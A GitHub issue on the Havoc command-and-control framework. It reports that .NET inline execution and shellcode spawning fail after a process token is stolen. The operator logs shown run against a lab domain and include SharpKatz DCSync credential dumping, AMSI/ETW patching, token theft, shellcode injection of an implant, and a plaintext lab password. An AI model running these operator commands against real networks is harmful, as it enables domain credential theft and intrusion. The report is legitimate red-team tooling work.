
[Teamserver-Client--Bug]: C# execution fails with user impersonation #546

Open
1 task done
Anon-Exploiter opened this issue Feb 11, 2025 · 3 comments
Labels
clientside/teamserver Clientside problem, not implantrelated

Comments


Anon-Exploiter commented Feb 11, 2025

Contact Details

No response

What happened?

The C# binary fails to execute if user impersonation is done.

If I do token steal pid and then run SharpKatz, it fails. However, when I revert, it works.


Did You Do a Pull First?

Latest (You performed a pull first)

Did You Try With the Dev Branch?

Yes

Relevant log output

[11:31:01] [DBUG] [agent.(*Agent).TaskDispatch:4276]: Agent: 4051e778, Command: COMMAND_TOKEN - DEMON_COMMAND_TOKEN_STEAL, User: NORTH\robb.stark, TokenID: 2, TargetPID: 1448
[11:31:04] [DBUG] [agent.(*Agent).TaskDispatch:6384]: Agent: 4051e778, Command: COMMAND_MEM_FILE, Success: 1, MemFileID: 5189ca26
[11:31:04] [DBUG] [agent.(*Agent).TaskDispatch:4134]: Agent: 4051e778, Command: COMMAND_ASSEMBLY_INLINE_EXECUTE - DOTNET_INFO_NET_VERSION
[11:31:04] [DBUG] [agent.(*Agent).TaskDispatch:4174]: Agent: 4051e778, Command: COMMAND_ASSEMBLY_INLINE_EXECUTE - DOTNET_INFO_FAILED
[11:31:13] [DBUG] [agent.(*Agent).TaskDispatch:4470]: Agent: 4051e778, Command: COMMAND_TOKEN - DEMON_COMMAND_TOKEN_REVERT, Successful: 1
[11:31:16] [DBUG] [agent.(*Agent).TaskDispatch:6384]: Agent: 4051e778, Command: COMMAND_MEM_FILE, Success: 1, MemFileID: 22402a32
[11:31:16] [DBUG] [agent.(*Agent).TaskDispatch:4134]: Agent: 4051e778, Command: COMMAND_ASSEMBLY_INLINE_EXECUTE - DOTNET_INFO_NET_VERSION
[11:31:16] [DBUG] [agent.(*Agent).TaskDispatch:3354]: Agent: 4051e778, Command: COMMAND_OUTPUT, len: 709

Did You Read Over Your Issue First?

  • I declare I made an effort and provided the necessary information for replication of the issue.
Anon-Exploiter added the clientside/teamserver label (Clientside problem, not implant related) on Feb 11, 2025.
Anon-Exploiter changed the title from "[Teamserver-Client--Bug]:" to "[Teamserver-Client--Bug]: C# execution fails with user impersonation" on Feb 11, 2025.

Anon-Exploiter commented Feb 11, 2025

Tested some more: token make works fine; with token steal, it fails.

11/02/2025 12:05:19 [user0xff] Demon » token steal 5148
[*] [B60DE2F4] Tasked demon to steal a process token
[+] Send Task to Agent [24 bytes]
[+] Successful stole and impersonated token from 5148 User:[NORTH\robb.stark] TokenID:[1]

11/02/2025 12:05:21 [user0xff] Demon » dotnet inline-execute /home/kali/tools/bins/csharp-files/SharpKatz.exe --Command dcsync --Domain NORTH.SEVENKINGDOMS.LOCAL --DomainController winterfell.NORTH.SEVENKINGDOMS.LOCAL
[*] [754E9306] Tasked demon to inline execute a dotnet assembly: /home/kali/tools/bins/csharp-files/SharpKatz.exe
[+] Send Task to Agent [394 bytes]
[*] [HwBpEngine] Amsi/Etw has been hooked & patched
[*] Using CLR Version: v4.0.30319
[!] Failed to execute assembly or initialize the clr

11/02/2025 12:05:27 [user0xff] Demon » token revert
[*] [64BC3857] Tasked demon to revert the process token
[+] Send Task to Agent [16 bytes]
[+] Successful reverted token to itself

11/02/2025 12:05:54 [user0xff] Demon » token make NORTH.SEVENKINGDOMS.LOCAL robb.stark sexywolfy
[*] [8F0BDC2E] Tasked demon to make a new network token for NORTH.SEVENKINGDOMS.LOCAL\robb.stark
[+] Send Task to Agent [126 bytes]
[+] Successfully created and impersonated token: NORTH.SEVENKINGDOMS.LOCAL\robb.stark

11/02/2025 12:06:01 [user0xff] Demon » dotnet inline-execute /home/kali/tools/bins/csharp-files/SharpKatz.exe --Command dcsync --Domain NORTH.SEVENKINGDOMS.LOCAL --DomainController winterfell.NORTH.SEVENKINGDOMS.LOCAL
[*] [3F19ADC7] Tasked demon to inline execute a dotnet assembly: /home/kali/tools/bins/csharp-files/SharpKatz.exe
[+] Send Task to Agent [396 bytes]
[*] [HwBpEngine] Amsi/Etw has been hooked & patched
[*] Using CLR Version: v4.0.30319
[+] Received Output [774 bytes]:
[*]
[*] 			System Information
[*] ----------------------------------------------------------------------
[*] | Platform: Win32NT                                                  |
[*] ----------------------------------------------------------------------
[*] | Major: 10            | Minor: 0             | Build: 17763         |
[*] ----------------------------------------------------------------------
[*] | Version: Microsoft Windows NT 6.2.9200.0                           |
[*] ----------------------------------------------------------------------
[*]
[!] NORTH.SEVENKINGDOMS.LOCAL will be the domain
[!] winterfell.NORTH.SEVENKINGDOMS.LOCAL will be the DC server
[*] Output file will be C:\Windows\TEMP\10022025170604.txt
[*] Replication data exported

Also

11/02/2025 12:10:25 [user0xff] Demon » token impersonate 4
[*] [F59A0672] Tasked demon to impersonate a process token
[+] Send Task to Agent [20 bytes]
[+] Successful impersonated 

11/02/2025 12:10:29 [user0xff] Demon » dotnet inline-execute /home/kali/tools/bins/csharp-files/SharpKatz.exe --Command dcsync --Domain NORTH.SEVENKINGDOMS.LOCAL --DomainController winterfell.NORTH.SEVENKINGDOMS.LOCAL
[*] [F41AD92E] Tasked demon to inline execute a dotnet assembly: /home/kali/tools/bins/csharp-files/SharpKatz.exe
[+] Send Task to Agent [396 bytes]
[*] [HwBpEngine] Amsi/Etw has been hooked & patched
[*] Using CLR Version: v4.0.30319
[!] Failed to execute assembly or initialize the clr

11/02/2025 12:10:37 [user0xff] Demon » token list
[*] [0FC52D6B] Tasked demon to list token vault
[+] Send Task to Agent [16 bytes]
[*] Token Vault:

  ID   Handle  Domain\User                           PID   Type           Impersonating
 ----  ------  -----------                           ---   -------------- -------------
 0     0x6d4   NORTH\robb.stark                      5756  stolen         No  
 1     0xb2c   NORTH\robb.stark                      5148  stolen         No  
 2     0xbe8   NORTH.SEVENKINGDOMS.LOCAL\robb.stark  5232  make (local)   No  
 3     0xbe4   NORTH\robb.stark                      5756  stolen         No  
 4     0x23c   NORTH\robb.stark                      940   stolen         Yes 

Anon-Exploiter (Author) commented

Additionally, I can't spawn a new shell using the impersonated token either. I just have to use token make; without it, it would not work.

# Does not work
token steal 824
shellcode spawn x64 /home/kali/OSEP/hav0c/demon.x64.bin


# Works 
token make NORTH.SEVENKINGDOMS.LOCAL robb.stark sexywolfy
shellcode spawn x64 /home/kali/OSEP/hav0c/demon.x64.bin
[12:19:22] [DBUG] [agent.(*Agent).TaskDispatch:4250]: Agent: 19969c22, Command: COMMAND_TOKEN - DEMON_COMMAND_TOKEN_IMPERSONATE, Successful: 1, User: 
[12:19:22] [DBUG] [agent.(*Agent).TaskDispatch:6426]: Agent: 19969c22, 1 bytes were left unread
[12:19:28] [DBUG] [agent.(*Agent).TaskDispatch:3623]: Agent: 19969c22, Command: COMMAND_INJECT_SHELLCODE, Status: 0
[12:19:37] [DBUG] [agent.(*Agent).TaskDispatch:4470]: Agent: 19969c22, Command: COMMAND_TOKEN - DEMON_COMMAND_TOKEN_REVERT, Successful: 1
[12:19:52] [DBUG] [agent.(*Agent).TaskDispatch:4250]: Agent: 19969c22, Command: COMMAND_TOKEN - DEMON_COMMAND_TOKEN_IMPERSONATE, Successful: 1, User: 
[12:19:52] [DBUG] [agent.(*Agent).TaskDispatch:6426]: Agent: 19969c22, 1 bytes were left unread
[12:20:02] [DBUG] [agent.(*Agent).TaskDispatch:3623]: Agent: 19969c22, Command: COMMAND_INJECT_SHELLCODE, Status: 0
[12:20:05] [DBUG] [handlers.handleDemonAgent:262]: Agent does not exists. hope this is a register request
[12:20:05] [DBUG] [agent.ParseDemonRegisterRequest:404]: Parsed DemonID: 5a2fae98
[12:20:05] [DBUG] [agent.ParseDemonRegisterRequest:412]: AgentID (5a2fae98) == DemonID (5a2fae98)

[12:20:05] [DBUG] [agent.ParseDemonRegisterRequest:424]: 
Hostname: CASTELBLACK
Username: SYSTEM
Domain  : north.sevenkingdoms.local
InternIP: 192.168.30.142
ExternIP: 192.168.56.22

[12:20:05] [DBUG] [agent.ParseDemonRegisterRequest:441]: 
ProcessName : C:\Windows\System32\notepad.exe
ProcessPID  : 6208
ProcessTID  : 5412
ProcessPPID : 0
ProcessArch : 2
Elevated    : 1
Base Address: 0x21b58170000

[12:20:05] [DBUG] [agent.ParseDemonRegisterRequest:459]: 
SleepDelay  : 0
SleepJitter : 15

[12:20:05] [DBUG] [agent.ParseDemonRegisterRequest:594]: Finished parsing demon
[12:20:05] [DBUG] [packer.(*Packer).Build:87]: No Aes Key specified
[12:20:05] [DBUG] [handlers.handleDemonAgent:295]: Finished request

Anon-Exploiter (Author) commented

Same within the dev branch.
